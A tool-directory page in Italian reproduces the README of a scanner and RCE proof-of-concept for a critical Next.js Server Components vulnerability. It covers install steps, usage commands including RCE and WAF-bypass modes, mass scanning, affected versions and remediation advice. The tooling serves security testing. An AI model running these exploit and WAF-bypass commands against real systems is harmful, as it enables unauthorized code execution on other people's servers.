Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
POC2-CVE-2025-55182 | Kitploit
Strumenti/GitHubGitHub/iamblacksolo2-bugbounty/poc2-cve-2025-55182
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebBypass WAFPenetration Testing
GitHubiamblacksolo2-bugbounty/poc2-cve-2025-55182

POC2-CVE-2025-55182

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
8 mesi faNon ancora revisionato

React2Shell Ultimate - CVE-2025-66478 Scanner

CVE-2025-66478 CVE-2025-55182 CVSS 10.0 Python 3.7+ MIT License

Lo scanner più completo per la vulnerabilità di Remote Code Execution RSC di Next.js

root@kitploit:~
╔════════════════════════════════════════════════════════════════════════╗
║     ____                 _   ___  ____  _          _ _                 ║
║    |  _ \ ___  __ _  ___| |_|__ \/ ___|| |__   ___| | |                ║
║    | |_) / _ \/ _` |/ __| __| / /\___ \| '_ \ / _ \ | |                ║
║    |  _ <  __/ (_| | (__| |_ / /_ ___) | | | |  __/ | |                ║
║    |_| \_\___|\__,_|\___|\__|____|____/|_| |_|\___|_|_|                ║
║                                                                        ║
║            React2Shell Ultimate CVE-2025-66478 Scanner v1.0.0         ║
║          Next.js RSC Remote Code Execution Vulnerability               ║
╠════════════════════════════════════════════════════════════════════════╣
║                                                                        ║
║                                                                        ║
╠════════════════════════════════════════════════════════════════════════╣
║  Modes: --safe (side-channel) | --rce (PoC) | --version | --local      ║
║  WAF Bypass: --waf-bypass | --vercel-bypass | --unicode                ║
╚════════════════════════════════════════════════════════════════════════╝

🚨 Panoramica della Vulnerabilità

CVE-2025-66478 (nota anche come CVE-2025-55182) è una vulnerabilità CRITICA (CVSS 10.0) di Remote Code Execution che colpisce le applicazioni Next.js che utilizzano React Server Components (RSC).

Versioni Affette

✨ Funzionalità

Questo strumento combina le migliori funzionalità di diversi scanner per CVE-2025-66478:

🚀 Installazione

root@kitploit:~
# Clone the repository
git clone https://github.com/hackersatyamrastogi/react2shell-ultimate.git
cd react2shell-ultimate

# Install dependencies
pip install -r requirements.txt

# Or install manually
pip install requests tqdm

📖 Utilizzo

Scansione di Base

root@kitploit:~
# Version detection only (fastest, no exploitation)
python3 react2shell-ultimate.py -u https://target.com --version

# Safe side-channel detection (no code execution)
python3 react2shell-ultimate.py -u https://target.com --safe

# RCE proof-of-concept (executes harmless calculation: 41*271=11111)
python3 react2shell-ultimate.py -u https://target.com --rce

# Comprehensive scan with all bypass attempts
python3 react2shell-ultimate.py -u https://target.com --comprehensive

Scansione di Massa

root@kitploit:~
# Scan multiple targets from file
python3 react2shell-ultimate.py -l targets.txt -t 20 -o results.json

# Quiet mode - only show vulnerable hosts
python3 react2shell-ultimate.py -l targets.txt -q

# JSON output to stdout
python3 react2shell-ultimate.py -l targets.txt --json

Scansione Locale di Progetti

root@kitploit:~
# Scan current directory
python3 react2shell-ultimate.py --local .

# Scan specific project path
python3 react2shell-ultimate.py --local /path/to/nextjs/projects

Tecniche di Bypass WAF

root@kitploit:~
# Junk data bypass (adds 128KB padding to evade content inspection)
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass

# Custom junk data size
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass --waf-bypass-size 256

# Unicode encoding bypass
python3 react2shell-ultimate.py -u https://target.com --rce --unicode

# Vercel-specific WAF bypass
python3 react2shell-ultimate.py -u https://target.com --rce --vercel-bypass

# Windows target (PowerShell payload)
python3 react2shell-ultimate.py -u https://target.com --rce --windows

Opzioni Avanzate

root@kitploit:~
# With proxy
python3 react2shell-ultimate.py -u https://target.com --rce --proxy http://127.0.0.1:8080

# Custom headers
python3 react2shell-ultimate.py -u https://target.com --rce -H "Authorization: Bearer token"

# Increased timeout
python3 react2shell-ultimate.py -u https://target.com --rce --timeout 30

# Verbose output
python3 react2shell-ultimate.py -u https://target.com --comprehensive -v

📋 Opzioni della Riga di Comando

🔬 Metodi di Rilevamento

1. Rilevamento Side-Channel Sicuro (--safe)

Attiva uno specifico pattern di risposta di errore senza eseguire alcun codice. Identifica le implementazioni RSC vulnerabili tramite il comportamento di gestione degli errori.

2. Proof-of-Concept RCE (--rce)

Esegue un calcolo matematico innocuo (echo $((41*271)) = 11111) per confermare la capacità RCE. Il risultato appare nell'intestazione X-Action-Redirect.

3. Rilevamento della Versione (--version)

  • Controlla l'intestazione X-Powered-By per la versione di Next.js
  • Analizza l'intestazione Vary per indicatori RSC
  • Interroga gli endpoint RSC per risposte text/x-component
  • Scansiona il sorgente della pagina per impronte Next.js

4. Scansione Locale (--local)

Scansiona le directory di progetto per:

  • package.json - Dichiarazione diretta delle dipendenze
  • package-lock.json - Lockfile NPM
  • yarn.lock - Lockfile Yarn
  • pnpm-lock.yaml - Lockfile PNPM
  • bun.lockb - Lockfile Bun

📊 Esempi di Output

Output su Console

root@kitploit:~
[VULNERABLE] https://target.com
    Version: 15.3.1 | Status: 200 | Method: rce_poc
    WAF Bypass: SUCCESS

[NOT VULNERABLE] https://safe-target.com
    Version: 15.5.7 | Status: 200 | Method: http_headers

[WAF BLOCKED] https://protected.com
    Version: 15.2.0 | Status: 403 | Method: rce_poc
    WAF Detected: Exploit blocked

Output JSON

root@kitploit:~
{
  "tool": "React2Shell Ultimate CVE-2025-66478 Scanner",
  "version": "1.0.0",
  "cve_ids": ["CVE-2025-55182", "CVE-2025-66478"],
  "scan_time": "2025-12-06T12:00:00Z",
  "total_results": 1,
  "results": [
    {
      "url": "https://target.com",
      "vulnerable": true,
      "version": "15.3.1",
      "status_code": 200,
      "detection_method": "rce_poc",
      "waf_detected": false,
      "waf_bypassed": false
    }
  ]
}

🛡️ Rimedio

Se trovi applicazioni vulnerabili:

  1. Aggiorna immediatamente alle versioni corrette:

    • Next.js 15.x → Aggiorna a 15.5.7+ (o alla patch della tua versione minore)
    • Next.js 16.x → Aggiorna a 16.0.7+
  2. Mitigazioni temporanee:

    • Usa Edge Runtime invece del runtime Node.js
    • Disabilita le Server Actions se non necessarie
    • Esegui il deployment dietro un WAF con rilevamento dei payload RSC
  3. Monitora i log per tentativi di sfruttamento

📚 Riferimenti

  • Next.js Security Advisory - CVE-2025-66478
  • Assetnote Research - React2Shell
  • NVD - CVE-2025-66478

⚠️ Disclaimer

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi.

  • Scansiona solo sistemi per cui hai il permesso esplicito di eseguire test
  • La modalità PoC RCE esegue codice sui sistemi target (calcolo innocuo)
  • L'accesso non autorizzato a sistemi informatici è illegale
  • L'autore non è responsabile dell'uso improprio di questo strumento

📄 Licenza

Licenza MIT - Vedi il file LICENSE per i dettagli.


⭐ Metti una stella a questo repository se lo trovi utile! ⭐

Scarica lo strumento
Intervallo di VersioniStato
Next.js 15.0.0 - 15.0.4⚠️ Vulnerabile
Next.js 15.1.0 - 15.1.8⚠️ Vulnerabile
Next.js 15.2.0 - 15.2.5⚠️ Vulnerabile
Next.js 15.3.0 - 15.3.5⚠️ Vulnerabile
Next.js 15.4.0 - 15.4.7⚠️ Vulnerabile
Next.js 15.5.0 - 15.5.6⚠️ Vulnerabile
Next.js 16.0.0 - 16.0.6⚠️ Vulnerabile
Next.js 14.3.0-canary.77+⚠️ Vulnerabile
Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7+✅ Patchata
Next.js 16.0.7+✅ Patchata
Next.js 13.x, 14.x stable✅ Non Vulnerabile
FunzionalitàDescrizione
🔍 Rilevamento Multi-ModalitàSide-channel sicuro, PoC RCE, solo versione, scansione locale
🛡️ Tecniche di Bypass WAFPadding con dati spazzatura, codifica Unicode, bypass specifico per Vercel
📁 Scansione Locale di ProgettiAnalizza package.json e i file di lock per dipendenze vulnerabili
⚡ Alte PrestazioniScansione multi-thread con concorrenza configurabile
📊 Formati di Output MultipliConsole, JSON, esportazione su file
🎯 Rilevamento Accurato della VersioneIntestazioni HTTP, fingerprinting RSC, riconoscimento delle versioni patchate
OpzioneDescrizione
-u, --urlURL singolo da scansionare
-l, --listFile contenente URL (uno per riga)
--localScansiona la directory di un progetto locale
--safeRilevamento side-channel sicuro (nessuna RCE)
--rceModalità proof-of-concept RCE
--versionSolo rilevamento della versione
--comprehensiveScansione completa con tutte le tecniche
--waf-bypassAggiunge dati spazzatura per il bypass del WAF
--waf-bypass-sizeDimensione dei dati spazzatura in KB (predefinito: 128)
--unicodeCodifica Unicode per il bypass del WAF
--vercel-bypassBypass WAF specifico per Vercel
--windowsUsa il payload PowerShell di Windows
-t, --threadsThread concorrenti (predefinito: 10)
--timeoutTimeout della richiesta in secondi (predefinito: 10)
-k, --insecureDisabilita la verifica SSL
--proxyURL del proxy (http://host:port)
-H, --headerIntestazione personalizzata (ripetibile)
-o, --outputFile di output (JSON)
--all-resultsSalva tutti i risultati, non solo quelli vulnerabili
-v, --verboseOutput dettagliato
-q, --quietMostra solo gli host vulnerabili
--jsonOutput JSON su stdout
--no-colorDisabilita l'output colorato